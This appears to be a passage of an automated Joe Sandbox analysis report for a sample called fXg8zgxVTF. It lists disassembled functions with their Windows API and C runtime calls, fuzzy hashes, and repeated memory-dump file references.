Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$Smanip_memset
String ID:
API String ID: 2640024514-0
Opcode ID: fe3939fcc6c31ea5a798ee69214ec39a77fb9aa748ce31e1c0713dfdef158876
Instruction ID: a98b306c5c203a64e5e0e15af270d5dce8e392ae21fee57128f7174cbf0c4674
Opcode Fuzzy Hash: fe3939fcc6c31ea5a798ee69214ec39a77fb9aa748ce31e1c0713dfdef158876
Instruction Fuzzy Hash: 36117FB0905159DBDB04EBD8C854BAEB774FF45308F14866DE425673C2CB791A00CB59

Function 0041126C Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 0041127C
GetTopWindow.USER32(00000000), ref: 004112BB
GetWindow.USER32(00000000,00000002), ref: 004112D9

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 7cecfa590a652a23ba312cdd4301f424ff4de5aa958e0daafffa1fa011044c21
Instruction ID: 99b9bad2ad82370bc85778982557080f79d77eafa7b0942ffb87d9f29ae1928c
Opcode Fuzzy Hash: 7cecfa590a652a23ba312cdd4301f424ff4de5aa958e0daafffa1fa011044c21
Instruction Fuzzy Hash: A9012936000159BBCF226F92DC05EDF3A6AAF48354F044056FA05A5170D77AC9A2EFAE

Function 00434283 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004342A9

Part of subcall function 004340CE: __fltout2.LIBCMT ref: 004340FA

__cftog_l.LIBCMT ref: 004342CF
__cftoe_l.LIBCMT ref: 00434301

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 0f8aece497d0ab664327677e8b1cd4d0ee91543c153f1ab9ded315c7155deae6
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 5811B03240014EBBCF125E84CC01CEE3F22BB5D394F499556FE1869130C33ADAB2AB85

Function 00410B4D Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00410B5A
GetTopWindow.USER32(00000000), ref: 00410B6D

Part of subcall function 00410B4D: GetWindow.USER32(00000000,00000002), ref: 00410BB4

GetTopWindow.USER32(?), ref: 00410B9D

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: cce5b7565dcb8cf70333b59bcd0c1d527886fbf21e6a0d29d37659f3957317be
Instruction ID: 07767690cf5d93cb1e0fb8a95ea08405c023556d9e7002c1b3725d6b8278450a
Opcode Fuzzy Hash: cce5b7565dcb8cf70333b59bcd0c1d527886fbf21e6a0d29d37659f3957317be
Instruction Fuzzy Hash: 8A017136009615B78F222AE2CC01EDF3A59AF553ACF004026FD1591221E7B9EAD196EE

Function 0045E4A0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

~_Task_impl.LIBCPMT ref: 0045E4DF

Part of subcall function 0040D997: __EH_prolog3.LIBCMT ref: 0040D99E

~_Task_impl.LIBCPMT ref: 0045E4F1

Part of subcall function 0040D9EC: __EH_prolog3.LIBCMT ref: 0040D9F3

~_Task_impl.LIBCPMT ref: 0045E503

Part of subcall function 00444A60: ~ctype.LIBCPMTD ref: 00444A9C
Part of subcall function 00444A60: ~_Task_impl.LIBCPMT ref: 00444AAB

~_Task_impl.LIBCPMT ref: 0045E536

Part of subcall function 0040BE01: __EH_prolog3.LIBCMT ref: 0040BE08

Part of subcall function 0040CF88: __EH_prolog3.LIBCMT ref: 0040CF8F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Task_impl$H_prolog3$~ctype
String ID:
API String ID: 932797589-0
Opcode ID: 2822e79cef2020f8b0a0213d905f26fc40eef3e62df464c92dd1d2d67487c67a
Instruction ID: 30f624b6e31bfee1153c10f162575650a6ea149f623aedf9c22c13ad49e11902
Opcode Fuzzy Hash: 2822e79cef2020f8b0a0213d905f26fc40eef3e62df464c92dd1d2d67487c67a
Instruction Fuzzy Hash: 9D118FB0905189DBDB04EBD8C851BBEB7B4FF45308F1046ADE4A2273C2CB792A00CB59

Function 0044C3E0 Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044C404
GetModuleHandleW.KERNEL32(00000000), ref: 0044C41C
LoadCursorW.USER32(00000000,00007F00), ref: 0044C446
RegisterClassW.USER32(00000003), ref: 0044C45A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ClassCursorHandleLoadModuleRegister_memset
String ID:
API String ID: 2776175367-0
Opcode ID: 47e321e3e641d47e215d355233cc7ecdf71600ac63391b3c08223a09bc06e4ac
Instruction ID: 094e14a083d5ab140189de91f2ba588e7ae6744f0888254b96aff873448ef988
Opcode Fuzzy Hash: 47e321e3e641d47e215d355233cc7ecdf71600ac63391b3c08223a09bc06e4ac
Instruction Fuzzy Hash: 9A01C5B8D042089BDB00CFA5D845BDCFBF0AB08304F14C15AE918BB381E7B55944CFA9

Function 00430DB7 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00430DC3

Part of subcall function 0042DD57: __getptd_noexit.LIBCMT ref: 0042DD5A
Part of subcall function 0042DD57: __amsg_exit.LIBCMT ref: 0042DD67

__getptd.LIBCMT ref: 00430DDA
__amsg_exit.LIBCMT ref: 00430DE8
__lock.LIBCMT ref: 00430DF8

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 0b9b77129e2fc11a8cb03da2399496a40ae78265f01b7eddc2ff8a4e89d06671
Instruction ID: f8d57e3ea4755a29c9e007273b319cf91758ef8a0ec3ea9669a48ea7f32fa123
Opcode Fuzzy Hash: 0b9b77129e2fc11a8cb03da2399496a40ae78265f01b7eddc2ff8a4e89d06671
Instruction Fuzzy Hash: 08F0F032A00720CBD720BBE6940674E73E06B08728F50464FE404972E2CB7CA940CB5E

Function 00418424 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00418449
GetTickCount.KERNEL32 ref: 00418456
